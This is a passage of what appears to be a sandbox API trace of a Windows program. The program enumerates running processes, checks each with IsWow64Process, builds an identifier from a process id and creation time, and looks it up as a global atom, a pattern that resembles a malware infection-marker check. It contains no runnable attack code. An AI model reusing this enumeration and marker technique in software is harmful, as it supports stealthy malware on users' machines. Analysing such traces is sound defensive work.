	[0096.817] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.817] CloseHandle (hObject=0x248) returned 1
	[0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.817] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.817] CloseHandle (hObject=0x248) returned 1
	[0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.818] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.818] CloseHandle (hObject=0x248) returned 1
	[0096.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.818] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.818] CloseHandle (hObject=0x248) returned 1
	[0096.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.818] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.818] CloseHandle (hObject=0x248) returned 1
	[0096.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac38, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.819] CloseHandle (hObject=0x248) returned 1
	[0096.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.819] CloseHandle (hObject=0x248) returned 1
	[0096.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c90, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.819] CloseHandle (hObject=0x248) returned 1
	[0096.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658e68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.819] CloseHandle (hObject=0x248) returned 1
	[0096.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.820] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.820] CloseHandle (hObject=0x248) returned 1
	[0096.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.820] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.820] CloseHandle (hObject=0x248) returned 1
	[0096.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658d88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.820] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.820] CloseHandle (hObject=0x248) returned 1
	[0096.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.821] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.821] CloseHandle (hObject=0x248) returned 1
	[0096.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.821] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.821] CloseHandle (hObject=0x248) returned 1
	[0096.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.821] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.821] CloseHandle (hObject=0x248) returned 1
	[0096.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.822] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.822] CloseHandle (hObject=0x248) returned 1
	[0096.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.822] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.822] CloseHandle (hObject=0x248) returned 1
	[0096.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.822] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.822] CloseHandle (hObject=0x248) returned 1
	[0096.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.823] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.823] CloseHandle (hObject=0x248) returned 1
	[0096.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.823] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.823] CloseHandle (hObject=0x248) returned 1
	[0096.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.823] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.823] CloseHandle (hObject=0x248) returned 1
	[0096.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658970, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.824] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.824] CloseHandle (hObject=0x248) returned 1
	[0096.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.824] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.824] CloseHandle (hObject=0x248) returned 1
	[0096.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.824] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.825] GetLastError () returned 0x5
	[0096.826] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.826] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.826] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.827] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetLastError () returned 0x5
	[0096.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.828] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.828] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.828] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.829] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.829] CloseHandle (hObject=0x248) returned 1
	[0096.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.829] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.829] CloseHandle (hObject=0x248) returned 1
	[0096.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ade8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.830] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.830] CloseHandle (hObject=0x248) returned 1
	[0096.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x166d8) returned 0xc0000004
	[0096.866] VirtualAlloc (lpAddress=0x0, dwSize=0x167d8, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x167d8, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
